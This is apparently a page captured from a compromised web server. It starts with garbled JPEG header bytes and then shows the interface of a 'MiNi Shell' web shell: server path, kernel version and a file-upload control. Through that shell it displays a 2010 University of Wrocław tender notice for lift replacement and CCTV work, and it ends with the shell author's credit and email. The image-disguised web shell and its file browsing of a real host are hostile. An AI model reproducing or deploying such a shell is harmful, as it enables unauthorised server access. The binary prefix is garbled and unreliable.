JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100422/114900-N-2010.html

<p class="kh_header"><b>Wrocław: Wymiana dźwigów osobowych wraz z konserwacją
oraz rozbudowa instalacji telewizji dozorowej
w DS. KREDKA przy ul. Grunwaldzkiej 69 we Wrocławiu</b><br>
<b>Numer ogłoszenia: 114900 - 2010; data zamieszczenia: 22.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Wrocławski , pl. Uniwersytecki 1, 50-137 Wrocław, woj. dolnośląskie, tel. 071 3752234, faks 071 3752472.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bzp.uni.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana dźwigów osobowych wraz z konserwacją
oraz rozbudowa instalacji telewizji dozorowej
w DS. KREDKA przy ul. Grunwaldzkiej 69 we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest ROBOTA BUDOWLANA:  Wymiana 2 dźwigów osobowych wraz z 36 miesięczną konserwacją urządzeń dźwigowych po uzyskaniu Decyzji pozwalającej na eksploatację, wydanej przez UDT, oraz rozbudową instalacji telewizji dozorowej w DS. Kredka przy ul. Grunwaldzkiej 69 we Wrocławiu 
W ramach prac należy wykonać :
      - demontaż istniejących 2 urządzeń dźwigowych wraz z prowadnicami i osprzętem 
      - dostawę i montaż 2 nowych dźwigów osobowych wraz nowymi prowadnicami i osprzętem
      - rozbudowę instalacji telewizji dozorowej 
Należy zapewnić : 
   - 36 - miesięczną konserwację urządzeń dźwigowych po uzyskaniu Decyzji pozwalającej na eksploatację wydanej przez UDT 
   - konserwację istniejących urządzeń dźwigowych od czasu protokólarnego wprowadzenia Wykonawcy na obiekt do czasu uzyskania od UDT Decyzji pozwalającej na eksploatację dźwigów   

1.1.	Parametry dźwigów: dźwig  nr 3 i 4 o parametrach : udźwig 630 kg lub 8 osób, ilość przystanków 22, wysokość podnoszenia 63,7 m, prędkość 1,6-2,0 m/s 
Pozostałe parametry dźwigów zawarte są w opisie do projektu wykonawczego. 
 
Dodatkowe wytyczne dla dostawcy dźwigu :
- monitoring kabin wind 
- awaryjny zjazd kabiny 
- zjazd pożarowy
Prace budowlane 
Pozostawia się bez zmian wymiary szybów dźwigów. 
Należy zdemontować istniejące dźwigi oraz ich osprzęt, a także prowadnice.
Wyczyszczenie podszybia, szybów windowych oraz maszynowni. 
Malowanie szybów windowych oraz maszynowni. 
Szczegółowy zakres prac budowlanych (w tym m.in. powiększenie otworów drzwiowych do kabin dźwigów) oraz prac elektrycznych zawarty w dokumentacji projektowej i przedmiarze robót.
Rozbudowa systemu telewizji dozorowej obejmuje instalacje kamer w dwóch windach. 
Kamery z wind zostaną podłączone do nowego rejestratora zainstalowanego w węźle systemu znajdującym się  w  pomieszczeniu wentylatorni na XV piętrze. 

Etapy robót
Przedmiot umowy realizowany będzie w dwóch etapach. Każdy z etapów obejmować będzie wymianę jednego dźwigu wraz z uzyskaniem decyzji UDT o dopuszczeniu do eksploatacji z zastrzeżeniem, że drugi etap obejmować będzie również rozbudowę instalacji telewizji dozorowej i spięcie sterowania dwóch dźwigów w grupę   -  zgodnie z harmonogramem o którym mowa § 1 ust. 5  pkt. 3
Każdy etap realizacji obejmuje:
- demontaż istniejących urządzeń dźwigowych wraz z prowadnicami i osprzętem
- dostawę i montaż nowego dźwigu osobowego wraz z nowymi prowadnicami i osprzętem
- konserwację istniejących urządzeń dźwigowych ( nr 3  i  nr 4 )  :  od dnia protokolarnego wprowadzenia Wykonawcy na obiekt   -   do dnia uzyskania przez Wykonawcę decyzji Urzędu Dozoru Technicznego zezwalającej na eksploatację wymienionych urządzeń dźwigowych   

Uwaga: Ze względu na zakwaterowanie dużej liczby mieszkańców w DS KREDKA (600 osób) nie należy wymieniać dwóch dźwigów jednocześnie (do wymiany drugiego dźwigu przystąpić po oddaniu do użytku pierwszego).

1.2.	Zakres konserwacji w okresie gwarancji - przez 36 miesięcy
Wykonawca prowadzić będzie konserwację zgodnie z obowiązującymi przepisami i wytycznymi UDT.
Do zakresu czynności konserwacyjnych należy:
a/ sprawdzenie bezpieczeństwa ruchu dźwigu w zakresie: instalacji sterowej, chwytaczy, rygli bezpieczeństwa, końcówek linowych i lin, urządzenia napędowego suwaków, usunięcie drobnych uszkodzeń oraz wymiana następujących części: styków w aparaturze sterowej, sprężarek w kastach, śrub, podkładek i nakrętek, rolek gumowych, główek bezpieczników zawleczek, wkładek topikowych dzwonków, instrukcji obsługi, żarówek oświetleniowych i sygnalizacyjnych.
b/ smarowanie prowadnic jeden raz na dwa miesiące, zmiana smaru w smarownicach co najmniej raz na miesiąc, uzupełnienie oleju w miarę potrzeby w układzie hydraulicznym, utrzymanie w czystości urządzeń dźwigowych.
c/ materiały do konserwacji podstawowej oraz w razie potrzeby materiały do konserwacji wzmożonej do wykonania w/w czynności konserwacyjnych dostarcza Wykonawca.
d/ przygotowanie dźwigu oraz udział w okresowych i głównych rewizjach dokonywanych jeden raz w roku przez Oddział Dozoru Technicznego. Koszt transportu niezbędnego 
przy rewizjach głównych ( raz w roku) obciążenie ponosi Wykonawca.
e/   przeprowadzenie raz w roku (przynajmniej 2 tygodnie przed ustalonym badaniem okresowym dźwigu przez UDT) pomiarów skuteczności ochrony przeciwpożarowej i badania 
stanu izolacji przewodów (zgodnie z zaleceniem UDT) oraz dostarczenie protokołów 
z przeprowadzonych badań Zamawiającemu.
f/ dokonywanie wszelkich innych czynności związanych z konserwacją urządzeń dźwigowych mających na celu właściwą eksploatację urządzeń - a nie wynikających z ich awarii

2.	Szczegółowy zakres robót - Przedmiot umowy zostanie wykonany zgodnie z : 
1. Projektem wykonawczym wymiany 2 dźwigów osobowych w budynku DS. Kredka przy ul. Grunwaldzkiej 69 we Wrocławiu - załącznik nr 7 do SIWZ . 
2. Specyfikacjami technicznymi wykonania i odbioru robót wymiany 2 dźwigów osobowych w DS. Kredka przy ul. Grunwaldzkiej 69 we Wrocławiu - załącznik nr 7 do SIWZ . 
3. Przedmiarem robót dot. wymiany 2 dźwigów osobowych wraz z zakresem robót towarzyszących - załącznik nr 7 do SIWZ
4. Projektem wykonawczym rozbudowy instalacji telewizji dozorowej w DS. Kredka  (kamery KW 3 i KW 4) - załącznik nr 7 do SIWZ
5. Specyfikacją techniczną wykonania i odbioru robót rozbudowy instalacji telewizji dozorowej w DS. Kredka (kamery KW 3 i KW 4) - załącznik nr 7 do SIWZ
6. Przedmiarem robót dot. wykonania rozbudowy telewizji dozorowej w DS. Kredka (kamery KW 3 i KW 4) - załącznik nr 7 do SIWZ
7. Harmonogramem rzeczowo - finansowym stanowiącym załącznik do umowy  
8. Zgodnie z   zakresem konserwacji wymienionym w punkcie 1.2. rozdziału II SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.26.23.11-4, 45.44.21.21-1, 45.31.30.00-4, 45.31.00.00-3, 45.31.20.00-7, 50.75.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 45.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości: 10 000 PLN (słownie: dziesięć tysięcy złotych).
2.	Wadium może być wnoszone w jednej lub kilku następujących formach: 
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 ze zm.).
3.	 Gwarancja bankowa, gwarancja ubezpieczeniowa, poręczenie bankowe oraz poręczenia innych instytucji winny zostać złożone w formie dokumentu oryginalnego. Dokument wadialny powinien być wystawiony na Zamawiającego, mieć formę oświadczenia bezwarunkowego, nieodwołalnego i płatnego na pierwsze pisemne żądanie Zamawiającego.
4.	Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Uniwersytetu Wrocławskiego: 
Bank Zachodni WBK S.A. 4 Oddział we Wrocławiu
12 1090 2503 0000 0001 1257 6100
z dopiskiem: Wadium na postępowanie pn.: Wymiana dźwigów osobowych wraz z konserwacją oraz rozbudowa instalacji telewizji dozorowej w DS. KREDKA przy ul. Grunwaldzkiej 69 we Wrocławiu. Nr postępowania: BZP-2422-7/10.
Wadium w formie pieniężnej winno znaleźć się na wskazanym rachunku Zamawiającego do terminu składania ofert. Wadium wniesione w pieniądzu uznaje się za wniesione z chwilą jego wpłynięcia na wskazane konto Zamawiającego. Bankowy dowód wpłaty należy przedstawić w formie dołączonej do oferty kserokopii potwierdzonej przez Wykonawcę za zgodność z oryginałem.
5.	Pozostałe niepieniężne formy wadium, winny być złożone w oryginale w Kwesturze Uniwersytetu Wrocławskiego przy pl. Uniwersyteckim 1 we Wrocławiu (Dział Finansowy pok. Nr 108, I piętro, okienko nr 1) do terminu składania ofert. Kopię należy dołączyć do oferty.
6.	Wadium winno obejmować cały okres czasu związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwóch robót polegających na wykonaniu montażu lub wymianie dźwigu/dźwigów w budynku wysokim (tj. powyżej 9 kondygnacji); 
W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena w/w warunku dotyczyć będzie wszystkich wykonawców łącznie.
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć dokumenty wymienione w rozdziale V punkcie 1 ppkt 2 SIWZ. Ocena spełnienia przedstawionego warunku zostanie dokonana w oparciu o przedłożone dokumenty wg formuły spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje następującymi osobami posiadającymi uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2006 r. nr 156, poz. 1118 z późn. zm.) i Rozporządzenie Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z dnia 16 maja 2006 r. nr 83 poz. 578) lub przedstawi pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji tych osób na okres korzystania z nich przy wykonywaniu zamówienia:
a)	kierownik budowy -  posiadający uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej,
b)	kierownik robót elektrycznych - posiadający uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej co najmniej w zakresie instalacji i urządzeń elektrycznych.
Dopuszczalne jest łączenie obu ww. funkcji przez jedną osobę.
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 23 Ustawy Pzp, określony warunek jest spełniony, gdy podmioty składające wspólną ofertę spełniają je łącznie.
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć dokumenty wymienione w rozdziale V w punkcie 1 ppkt 3 i 1 ppkt 4  SIWZ. 
Ocena spełnienia przedstawionego warunku zostanie dokonana w oparciu o przedłożone dokumenty wg formuły spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz Oferty (Załącznik nr 1 do SIWZ), 
2)	Kalkulacja cenowa (Załącznik nr 9 do SIWZ), 
3)	Pełnomocnictwo dla osoby/osób podpisującej/cych ofertę do podejmowania zobowiązań w imieniu wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych;
4)	W przypadku złożenia oferty wspólnej przez kilku Wykonawców należy przedstawić pełnomocnictwo, w formie oryginału albo kopii poświadczonej za zgodność z oryginałem przez notariusza, ustanawiające pełnomocnika do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu o udzielenie niniejszego zamówienia i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców składających ofertę wspólną (Partnerów). Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Partnerów;
5)	dowód wniesienia wadium;
6)	Pisemne zobowiązanie innych podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów, na okres korzystania z nich przy wykonaniu zamówienia, jeżeli wykonawca polegać będzie na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków;
7)	Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, które będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt 2 ppkt 1-2 rozdz. V SIWZ .
7.	W przypadku złożenia wspólnej oferty przez kilka podmiotów każdy z nich zobowiązany jest przedstawić dokumenty wystawione na niego wymienione w pkt 2 (ppkt 1-2) ZROZDZ. v siwz Dokumenty wymienione w pkt 1 (ppkt 1-4) podmioty składają wspólnie, tj. warunki w nich określone są spełnione, gdy podmioty składające wspólną ofertę spełniają je łącznie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)  Ze względów losowych dopuszcza się zmianę przedstawicieli stron posiadających wskazane w umowie kwalifikacje oraz dopuszcza się zmianę terminu wykonania przedmiotu zamówienia ze względu na kwaterowanie studentów w obiekcie maksymalnie o 3 miesiące.
2)  Dopuszcza się aneksy terminowe:
    - dopuszcza się wydłużenie terminu wykonania zadania ze względu na uzasadnione opóźnienia w dostawie urządzeń nie dłużej jednak niż o 30 dni.
    -z powodu awarii instalacji wod- kan. , co, instal. elekt. nie dłużej jednak niż o 30 dni.
    - w przypadku wystąpienia zmian w dokumentacji projektowej niemożliwych wcześniej do przewidzenia wpływających na wydłużenie terminu realizacji zadania ( zgłoszonych przez Wykonawcę i zatwierdzonych przez projektanta i Zamawiającego) dopuszcza się wydłużenie  terminu o 3 miesiące.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bzp.uni.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych Uniwersytetu Wrocławskiego, ul. Kuźnicza 49/55, 50-138 Wrocław, I piętro, pokój 100.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2010 godzina 10:00, miejsce: Biuro Zamówień Publicznych Uniwersytetu Wrocławskiego, ul. Kuźnicza 49/55, 50-138 Wrocław, I piętro, pokój 100.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com